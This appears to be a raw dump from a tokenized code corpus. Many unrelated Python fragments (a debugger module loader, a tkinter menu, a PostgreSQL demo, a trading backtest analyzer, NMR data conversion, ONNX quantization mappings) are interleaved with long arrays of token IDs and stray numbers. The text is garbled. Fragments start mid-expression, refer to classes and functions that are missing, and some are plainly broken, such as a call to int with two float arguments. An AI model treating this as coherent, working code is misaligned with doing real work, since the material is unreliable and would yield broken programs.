c_uint() self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual)) return buf.value, actual.value def seek_data(self, offset): """Seeks for data reading purposes. :param offset: The offset to seek to in PCM samples. :type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long.""" self._call_fmod("FMOD_Sound_SeekData", offset)
[ 6738, 764, 69, 4666, 15252, 1330, 1635, 198, 6738, 764, 69, 4666, 15252, 1330, 4808, 12736, 198, 6738, 764, 7249, 942, 1330, 37801, 11, 569, 9782, 1581, 198, 6738, 764, 20541, 85, 945, 1330, 651, 62, 4871, 628, 198, 198, 4871, 9506, ...
2.269261
1,285
from collections.abc import Iterable
import warnings

from hdmf.utils import docval, popargs, call_docval_func, get_docval

from . import register_class, CORE_NAMESPACE
from .core import NWBDataInterface, NWBData
[ 6738, 17268, 13, 39305, 1330, 40806, 540, 198, 11748, 14601, 198, 198, 6738, 289, 36020, 69, 13, 26791, 1330, 2205, 2100, 11, 1461, 22046, 11, 869, 62, 15390, 2100, 62, 20786, 11, 651, 62, 15390, 2100, 198, 198, 6738, 764, 1330, 7881,...
3.205882
68
""" Implement a class function for user to put in a zip-code and search relevant information about business entities in that zip-code area. """ from flask.ext.wtf import Form from wtforms import StringField, BooleanField from wtforms.validators import DataRequired
[ 37811, 198, 220, 220, 220, 48282, 257, 1398, 2163, 329, 2836, 284, 1234, 287, 257, 19974, 12, 8189, 290, 198, 220, 220, 220, 2989, 5981, 1321, 546, 1597, 12066, 287, 326, 19974, 12, 8189, 1989, 13, 198, 37811, 198, 198, 6738, 42903, ...
3.819444
72
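The row above only carries the module docstring and imports; a minimal sketch of what such a search form could look like follows, reusing those imports. The class and field names are assumptions, not part of the original file.

# Hypothetical zip-code search form; names are illustrative only.
class BusinessSearchForm(Form):
    zip_code = StringField('zip_code', validators=[DataRequired()])
    open_only = BooleanField('open_only', default=False)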
'''
1. Write a Python program to access a specific item in a singly linked list using index value.

2. Write a Python program to set a new value of an item in a singly linked list using index value.

3. Write a Python program to delete the first item from a singly linked list.
'''
[ 7061, 6, 198, 16, 13, 19430, 257, 11361, 1430, 284, 1895, 257, 2176, 2378, 287, 257, 1702, 306, 6692, 1351, 1262, 6376, 1988, 13, 198, 198, 17, 13, 19430, 257, 11361, 1430, 284, 900, 257, 649, 1988, 286, 281, 2378, 287, 257, 1702, ...
3.773333
75
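A compact, self-contained sketch that answers the three exercises above; the class and method names are my own choices, not taken from any original solution.

class Node:
    def __init__(self, value):
        self.value = value
        self.next = None


class SinglyLinkedList:
    def __init__(self, iterable=()):
        self.head = None
        # build the list by pushing items at the head in reverse order
        for item in reversed(list(iterable)):
            node = Node(item)
            node.next = self.head
            self.head = node

    def _node_at(self, index):
        node = self.head
        for _ in range(index):
            if node is None:
                break
            node = node.next
        if node is None:
            raise IndexError('index out of range')
        return node

    def get(self, index):            # exercise 1: access an item by index
        return self._node_at(index).value

    def set(self, index, value):     # exercise 2: set a new value by index
        self._node_at(index).value = value

    def delete_first(self):          # exercise 3: delete the first item
        if self.head is None:
            raise IndexError('delete from empty list')
        self.head = self.head.next


items = SinglyLinkedList(['a', 'b', 'c'])
print(items.get(1))   # b
items.set(1, 'B')
items.delete_first()
print(items.get(0))   # B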
__version__ = "0.3.4dev"
[ 834, 9641, 834, 796, 366, 15, 13, 18, 13, 19, 7959, 1, 198 ]
1.923077
13
import unittest

from premailer.premailer import capitalize_float_margin
[ 11748, 555, 715, 395, 198, 198, 6738, 4199, 603, 263, 13, 31605, 603, 263, 1330, 35160, 62, 22468, 62, 36153, 628 ]
3.52381
21
import sys try: try: from _pydevd_bundle_ext import pydevd_cython as mod except ImportError: from _pydevd_bundle import pydevd_cython as mod except ImportError: import struct try: is_python_64bit = (struct.calcsize('P') == 8) except: # In Jython this call fails, but this is Ok, we don't support Jython for speedups anyways. raise ImportError plat = '32' if is_python_64bit: plat = '64' # We also accept things as: # # _pydevd_bundle.pydevd_cython_win32_27_32 # _pydevd_bundle.pydevd_cython_win32_34_64 # # to have multiple pre-compiled pyds distributed along the IDE # (generated by build_tools/build_binaries_windows.py). mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat) check_name = '_pydevd_bundle.%s' % (mod_name,) mod = getattr(__import__(check_name), mod_name) # Regardless of how it was found, make sure it's later available as the # initial name so that the expected types from cython in frame eval # are valid. sys.modules['_pydevd_bundle.pydevd_cython'] = mod trace_dispatch = mod.trace_dispatch PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo set_additional_thread_info = mod.set_additional_thread_info global_cache_skips = mod.global_cache_skips global_cache_frame_skips = mod.global_cache_frame_skips _set_additional_thread_info_lock = mod._set_additional_thread_info_lock fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func version = getattr(mod, 'version', 0)
[ 11748, 25064, 201, 198, 28311, 25, 201, 198, 220, 220, 220, 1949, 25, 201, 198, 220, 220, 220, 220, 220, 220, 220, 422, 4808, 79, 5173, 1990, 67, 62, 65, 31249, 62, 2302, 1330, 279, 5173, 1990, 67, 62, 948, 400, 261, 355, 953, 2...
2.320225
712
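A tiny, self-contained illustration of the pre-compiled module naming scheme described in the comments above; the platform and version values are example inputs.

# Reproduces the '_pydevd_bundle.pydevd_cython_<platform>_<pyver>_<bits>' scheme.
sys_platform, version_info, plat = 'win32', (3, 4), '64'   # example values
mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys_platform, version_info[0], version_info[1], plat)
check_name = '_pydevd_bundle.%s' % (mod_name,)
print(check_name)  # _pydevd_bundle.pydevd_cython_win32_34_64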
from tests.fixtures import api, PROJECT_NAME

assert api


THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent"
THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
[ 6738, 5254, 13, 69, 25506, 1330, 40391, 11, 21965, 23680, 62, 20608, 198, 198, 30493, 40391, 628, 198, 4221, 5883, 33, 62, 26947, 16, 796, 275, 1, 5661, 9160, 548, 25120, 400, 20566, 11299, 1, 198, 4221, 5883, 33, 62, 26947, 17, 796...
2.672131
61
# Generalizing so we don't repeat the code!
[ 2, 3611, 528, 25440, 31215, 645, 46152, 343, 267, 269, 12894, 78, 0, 628 ]
3
14
""" Copyright (c) 2022 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype from nncf.common.graph.operator_metatypes import UnknownMetatype DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = { QuantizationTrait.INPUTS_QUANTIZABLE: [ ONNXConvolutionMetatype, ONNXLinearMetatype, ONNXAveragePoolMetatype, ONNXGlobalAveragePoolMetatype, ONNXAddLayerMetatype, ONNXMulLayerMetatype, ONNXBatchNormMetatype, ONNXHardSigmoidMetatype, ONNXResizeMetatype, ], QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype, ONNXSoftmaxMetatype, UnknownMetatype], QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype], QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: [] }
[ 37811, 198, 15069, 357, 66, 8, 33160, 8180, 10501, 198, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 921, 743, 7...
2.470041
968
import ops
import iopc

TARBALL_FILE="samba-4.8.4.tar.gz"
TARBALL_DIR="samba-4.8.4"
INSTALL_DIR="samba-bin"

pkg_path = ""
output_dir = ""
tarball_pkg = ""
tarball_dir = ""
install_dir = ""
install_tmp_dir = ""
cc_host = ""
tmp_include_dir = ""
dst_include_dir = ""
dst_lib_dir = ""
dst_usr_local_lib_dir = ""
[ 11748, 39628, 198, 11748, 1312, 404, 66, 198, 198, 51, 37304, 7036, 62, 25664, 2625, 82, 31842, 12, 19, 13, 23, 13, 19, 13, 18870, 13, 34586, 1, 198, 51, 37304, 7036, 62, 34720, 2625, 82, 31842, 12, 19, 13, 23, 13, 19, 1, 198, ...
2.190141
142
# -*- coding: utf-8 -*-
#
# michael a.g. aïvazis
# orthologue
# (c) 1998-2019 all rights reserved
#


# declaration


# end of file
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 285, 40302, 257, 13, 70, 13, 1196, 89, 271, 198, 2, 29617, 39795, 198, 2, 357, 66, 8, 7795, 12, 23344, 477, 2489, 10395, 198, 2, 628, 198, 2, 14305, 6...
2.407407
54
import os

x = 7
print(x + 1)
[ 11748, 28686, 198, 198, 87, 796, 767, 198, 4798, 7, 87, 1343, 352, 8, 198 ]
2
15
#! /usr/bin/env python3
# -*- coding: utf-8 -*-

import math

print(int(1.9,9.7))
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 10688, 198, 198, 4798, 7, 600, 7, 16, 13, 24, 11, 24, 13, 22, 4008, 198 ]
1.906977
43
from almetro.instance import growing
from almetro.metro import Metro
import timeit
[ 6738, 435, 4164, 305, 13, 39098, 1330, 3957, 198, 6738, 435, 4164, 305, 13, 4164, 305, 1330, 12477, 198, 11748, 640, 270, 628, 628 ]
3.583333
24
# coding: utf-8
from __future__ import unicode_literals

import re
import json
from .common import InfoExtractor
from .youtube import YoutubeIE, YoutubeBaseInfoExtractor
from ..compat import (
    compat_urllib_parse_unquote,
    compat_urllib_parse_unquote_plus,
    compat_HTTPError
)
from ..utils import (
    bug_reports_message,
    clean_html,
    dict_get,
    extract_attributes,
    ExtractorError,
    get_element_by_id,
    HEADRequest,
    int_or_none,
    KNOWN_EXTENSIONS,
    merge_dicts,
    mimetype2ext,
    orderedSet,
    parse_duration,
    parse_qs,
    str_to_int,
    str_or_none,
    traverse_obj,
    try_get,
    unified_strdate,
    unified_timestamp,
    urlhandle_detect_ext,
    url_or_none
)
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 11748, 302, 198, 11748, 33918, 198, 6738, 764, 11321, 1330, 14151, 11627, 40450, 198, 6738, 764, 11604, 1330, 27431, 10008, 11, ...
2.380328
305
# Graphical Interface XI
# Menu


from tkinter import *

root=Tk()

barraMenu=Menu(root)
root.config(menu=barraMenu, width=600, height=400)

archivoMenu=Menu(barraMenu, tearoff=0)
archivoMenu.add_command(label="Nuevo")
archivoMenu.add_command(label="Guardar")
archivoMenu.add_command(label="Guardar Como")
archivoMenu.add_separator()
archivoMenu.add_command(label="Cerrar")
archivoMenu.add_command(label="Salir")

archivoEdicion=Menu(barraMenu, tearoff=0)
archivoHerramientas=Menu(barraMenu)
archivoEdicion.add_command(label="Copiar")
archivoEdicion.add_command(label="Cortar")
archivoEdicion.add_command(label="Pegar")

archivoAyuda=Menu(barraMenu, tearoff=0)

barraMenu.add_cascade(label="Archivo", menu=archivoMenu)
barraMenu.add_cascade(label="Edicion", menu=archivoEdicion)
barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas)
barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda)

archivoAyuda.add_command(label="Licencia")
archivoAyuda.add_command(label="Acerca de...")

root.mainloop()
[ 2, 4225, 69, 292, 7037, 69, 3970, 30554, 198, 2, 21860, 628, 198, 6738, 256, 74, 3849, 1330, 1635, 198, 198, 15763, 28, 51, 74, 3419, 198, 198, 5657, 430, 23381, 28, 23381, 7, 15763, 8, 198, 15763, 13, 11250, 7, 26272, 28, 5657, ...
2.618182
385
# Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
[ 2, 15069, 2177, 19507, 605, 12052, 13, 198, 2, 49962, 739, 262, 17370, 6489, 85, 18, 11, 766, 38559, 18310, 2393, 329, 3307, 13, 198 ]
3.64
25
# -*- coding: UTF-8 -*-

import psycopg2  #postgresql
import time
import datetime

if __name__ == "__main__":
    pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
    print("===========insert_one==============")
    pg.insert_one("wong", 1)
    print("===========query_all==============")
    pg.query_all()
    print("===========query_lastone==============")
    pg.query_lastone()
    print("===========query_byname==============")
    pg.query_byname("catcher")
    print("===========update_genderbyid==============")
    pg.update_genderbyid(4, 2)
    print("===========delete_byname==============")
    pg.delete_byname("wong")
    print("===========query_all==============")
    pg.query_all()
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 201, 198, 201, 198, 11748, 17331, 22163, 70, 17, 220, 1303, 7353, 34239, 13976, 201, 198, 11748, 640, 201, 198, 11748, 4818, 8079, 220, 201, 198, 201, 198, 361, 11593, 3672, 834...
2.361111
324
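The `__main__` block above drives a `PgDemo` helper class that is not shown in the row. A minimal sketch of such a wrapper follows; the table layout (`person(name, gender)`), the SQL, and the two methods shown are assumptions, not taken from the original file.

import psycopg2


class PgDemo:
    def __init__(self, host, port, dbname, user, password):
        # one connection per helper instance
        self.conn = psycopg2.connect(host=host, port=port, dbname=dbname,
                                     user=user, password=password)

    def insert_one(self, name, gender):
        # the connection context manager commits the transaction on success
        with self.conn, self.conn.cursor() as cur:
            cur.execute("INSERT INTO person (name, gender) VALUES (%s, %s)",
                        (name, gender))

    def query_all(self):
        with self.conn.cursor() as cur:
            cur.execute("SELECT * FROM person")
            for row in cur.fetchall():
                print(row)

# The remaining methods used above (query_lastone, query_byname, ...) would
# follow the same cursor/execute pattern.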
#! /usr/bin/env python

import nmrglue as ng

# read in the varian data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")

# Set the parameters
u = ng.pipe.guess_udic(dic,data)

# create the converter object and initialize with varian data
C = ng.convert.converter()
C.from_pipe(dic,data,u)

# create pipe data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)

# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28642, 81, 4743, 518, 355, 23370, 198, 198, 2, 1100, 287, 262, 1401, 666, 1366, 198, 67, 291, 11, 7890, 796, 23370, 13, 34360, 13, 961, 7203, 40720, 11321, 62, 7890, ...
2.50365
274
# encoding: utf-8 from __future__ import print_function import os import json from collections import OrderedDict import numpy as np import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt from matplotlib.ticker import Formatter from jaqs.trade.analyze.report import Report from jaqs.data import RemoteDataService from jaqs.data.basic.instrument import InstManager from jaqs.trade import common import jaqs.util as jutil STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static") TO_PCT = 100.0 MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6', 'axes.facecolor': '#F6F6F6', 'axes.edgecolor': '#D3D3D3', 'text.color': '#555555', 'grid.color': '#B1B1B1', 'grid.alpha': 0.3, # scale 'axes.linewidth': 2.0, 'axes.titlepad': 12, 'grid.linewidth': 1.0, 'grid.linestyle': '-', # font size 'font.size': 13, 'axes.titlesize': 18, 'axes.labelsize': 14, 'legend.fontsize': 'small', 'lines.linewidth': 2.5, } def _init_inst_data(self): symbol_str = ','.join(self.universe) if self.dataview is not None: data_inst = self.dataview.data_inst self.inst_map = data_inst.to_dict(orient='index') elif self.data_api is not None: inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str) self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()} del inst_mgr else: raise ValueError("no dataview or dataapi provided.") def _init_trades(self, df): """Add datetime column. """ df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time']) df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0) # self._trades = jutil.group_df_to_dict(df, by='symbol') self._trades = df def _init_symbol_price(self): """Get close price of securities in the universe from data server.""" if self.dataview is not None: df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date) df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date) else: df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close', start_date=self.start_date, end_date=self.end_date) if msg != '0,': print(msg) df_close = df.pivot(index='trade_date', columns='symbol', values='close') df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close', start_date=self.start_date, end_date=self.end_date) if msg != '0,': print(msg) df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close') self._closes = df_close self._closes_adj = df_close_adj def _init_universe(self, securities): """Return a set of securities.""" self._universe = set(securities) def _init_configs(self, folder): import codecs with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f: configs = json.load(f) self._configs = configs self.init_balance = self.configs['init_balance'] self.start_date = self.configs['start_date'] self.end_date = self.configs['end_date'] ''' def get_daily(self): """Add various statistics to daily DataFrame.""" self.daily = self._get_daily(self.closes, self.trades) daily_dic = dict() for sec, df_trade in self.trades.items(): df_close = self.closes[sec].rename('close') res = self._get_daily(df_close, df_trade) daily_dic[sec] = res self.daily = daily_dic ''' def gen_report(self, source_dir, template_fn, out_folder='.', selected=None): """ Generate HTML (and PDF) report of the trade analysis. Parameters ---------- source_dir : str path of directory where HTML template and css files are stored. template_fn : str File name of HTML template. 
out_folder : str Output folder of report. selected : list of str or None List of symbols whose detailed PnL curve and position will be plotted. # TODO: this parameter should not belong to function """ dic = dict() dic['html_title'] = "Alpha Strategy Backtest Result" dic['selected_securities'] = selected # we do not want to show username / password in report dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)} dic['performance_metrics'] = self.performance_metrics dic['risk_metrics'] = self.risk_metrics dic['position_change'] = self.position_change dic['account'] = self.account dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol') dic['daily_position'] = self.daily_position self.report_dic.update(dic) self.returns.to_csv(os.path.join(out_folder, 'returns.csv')) r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder) r.generate_html() r.output_html('report.html') class EventAnalyzer(BaseAnalyzer): class AlphaAnalyzer(BaseAnalyzer): ''' def get_returns_OLD(self, compound_return=True, consider_commission=True): profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit' vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()} df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit # TODO temperary solution df_profit = df_profit.fillna(method='ffill').fillna(0.0) strategy_value = df_profit.sum(axis=1) + self.configs['init_balance'] market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill') market_values.columns = ['strat', 'bench'] df_returns = market_values.pct_change(periods=1).fillna(0.0) df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum') if compound_return: df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1 df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0) else: df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench'] df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0) start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d") end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d") years = (end - start).days / 365.0 self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1 self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.) self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1] self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol'] # bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date') # df_returns = df_returns.join(bt_strat_mv, how='right') self.returns = df_returns ''' def _brinson(self, close, pos, index_weight, group): """ Brinson Attribution. Parameters ---------- close : pd.DataFrame Index is date, columns are symbols. pos : pd.DataFrame Index is date, columns are symbols. index_weight : pd.DataFrame Index is date, columns are symbols. group : pd.DataFrame Index is date, columns are symbols. 
Returns ------- dict """ ret = close.pct_change(1) pos_sum = pos.sum(axis=1) pf_weight = pos.div(pos_sum, axis=0) pf_weight.loc[pos_sum == 0, :] = 0.0 assert pf_weight.isnull().sum().sum() == 0 pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns) pf_weight = pf_weight.fillna(0.0) weighted_ret_pf = ret.mul(pf_weight) weighted_ret_index = ret.mul(index_weight) index_group_weight = group_sum(index_weight, group) pf_group_weight = group_sum(pf_weight, group) pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight) index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight) allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret) allo_ret = allo_ret_group.sum(axis=1) selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight) selection_ret = selection_ret_group.sum(axis=1) active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1)) inter_ret = active_ret - selection_ret - allo_ret df_brinson = pd.DataFrame(index=allo_ret.index, data={'allocation': allo_ret, 'selection': selection_ret, 'interaction': inter_ret, 'total_active': active_ret}) return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group} def brinson(self, group): """ Parameters ---------- group : str or pd.DataFrame If group is string, this function will try to fetch the corresponding DataFrame from DataView. If group is pd.DataFrame, it will be used as-is. Returns ------- """ if isinstance(group, str): group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date) elif isinstance(group, pd.DataFrame): pass else: raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group)) if group is None or group.empty: raise ValueError("group is None or group is empty") close = self.closes_adj pos = self.daily_position index_weight = self._get_index_weight() res_dic = self._brinson(close, pos, index_weight, group) df_brinson = res_dic['df_brinson'] self.df_brinson = df_brinson self.report_dic['df_brinson'] = df_brinson plot_brinson(df_brinson, save_folder=self.file_folder) def plot_daily_trading_holding_pnl(trading, holding, total, total_cum): """ Parameters ---------- Series """ idx0 = total.index n = len(idx0) idx = np.arange(n) fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True) ax1 = ax0.twinx() bar_width = 0.4 profit_color, lose_color = '#D63434', '#2DB635' curve_color = '#174F67' y_label = 'Profit / Loss ($)' color_arr_raw = np.array([profit_color] * n) color_arr = color_arr_raw.copy() color_arr[total < 0] = lose_color ax0.bar(idx, total, width=bar_width, color=color_arr) ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],) ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d')) ax1.plot(idx, total_cum, lw=1.5, color=curve_color) ax1.set(ylabel='Cum. 
' + y_label) ax1.yaxis.label.set_color(curve_color) color_arr = color_arr_raw.copy() color_arr[trading < 0] = lose_color ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr) ax2.set(title='Daily Trading PnL', ylabel=y_label) color_arr = color_arr_raw.copy() color_arr[holding < 0] = lose_color ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr) ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10]) return fig def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret): """ Parameters ---------- Series """ fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True) idx_dt = portfolio_cum_ret.index idx = np.arange(len(idx_dt)) y_label_ret = "Cumulative Return (%)" ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67') ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6') ax1.legend(loc='upper left') ax1.set(title="Absolute Return of Portfolio and Benchmark", #xlabel="Date", ylabel=y_label_ret) ax1.grid(axis='y') ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051') ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret #xlabel="Date", ) ax2.grid(axis='y') ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d')) # 17-09-31 fig.tight_layout() return fig def plot_brinson(df, save_folder): """ Parameters ---------- df : pd.DataFrame """ allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active'] fig, ax1 = plt.subplots(1, 1, figsize=(21, 8)) idx0 = df.index idx = range(len(idx0)) ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return') ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return') ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return') # ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return') ax1.axhline(0.0, color='k', lw=0.5, ls='--') ax1.legend(loc='upper left') ax1.set_xlabel("Date") ax1.set_ylabel("Return") ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d')) plt.tight_layout() fig.savefig(os.path.join(save_folder, 'brinson_attribution.png')) plt.close() def calc_avg_pos_price(pos_arr, price_arr): """ Calculate average cost price using position and fill price. When position = 0, cost price = symbol price. """ assert len(pos_arr) == len(price_arr) avg_price = np.zeros_like(pos_arr, dtype=float) avg_price[0] = price_arr[0] for i in range(pos_arr.shape[0] - 1): if pos_arr[i+1] == 0: avg_price[i+1] = 0.0 else: pos_diff = pos_arr[i+1] - pos_arr[i] if pos_arr[i] == 0 or pos_diff * pos_arr[i] > 0: count = True else: count = False if count: avg_price[i+1] = (avg_price[i] * pos_arr[i] + pos_diff * price_arr[i+1]) * 1. 
/ pos_arr[i+1] else: avg_price[i+1] = avg_price[i] return avg_price def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1): old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()} mpl.rcParams.update(MPL_RCPARAMS) idx0 = df.index idx = range(len(idx0)) price = df.loc[:, 'close'] bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values profit = df.loc[:, 'CumProfit'].values avgpx = df.loc[:, 'AvgPosPrice'] bv_m = np.max(bv) sv_m = np.max(sv) if bv_m > 0: bv = bv / bv_m * 100 if sv_m > 0: sv = sv / sv_m * 100 fig = plt.figure(figsize=(14, 10)) ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3) ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1) ax2 = ax1.twinx() ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow') ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred') ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen') ax1.plot(idx, avgpx, lw=1, marker='', color='green') ax1.legend(loc='upper left') ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)") ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m')) ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4) ax2.legend(loc='upper right') ax2.set(ylabel="Profit / Loss ($)") # ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M')) ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2) ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8) ax3.set(title="Position of {:s}".format(symbol)) fig.tight_layout() fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi()) mpl.rcParams.update(old_mpl_rcparams)
[ 2, 21004, 25, 3384, 69, 12, 23, 198, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 28686, 198, 11748, 33918, 198, 6738, 17268, 1330, 14230, 1068, 35, 713, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 2...
2.048581
8,419
#
#   Lightnet data transforms
#   Copyright EAVISE
#

from .pre import *
from .post import *
from .util import *
[ 2, 198, 2, 220, 220, 4401, 3262, 1366, 31408, 198, 2, 220, 220, 15069, 412, 10116, 24352, 198, 2, 198, 198, 6738, 764, 3866, 1330, 1635, 198, 6738, 764, 7353, 1330, 1635, 198, 6738, 764, 22602, 1330, 1635, 198 ]
2.923077
39
from rest_framework import status
from rest_framework.exceptions import APIException
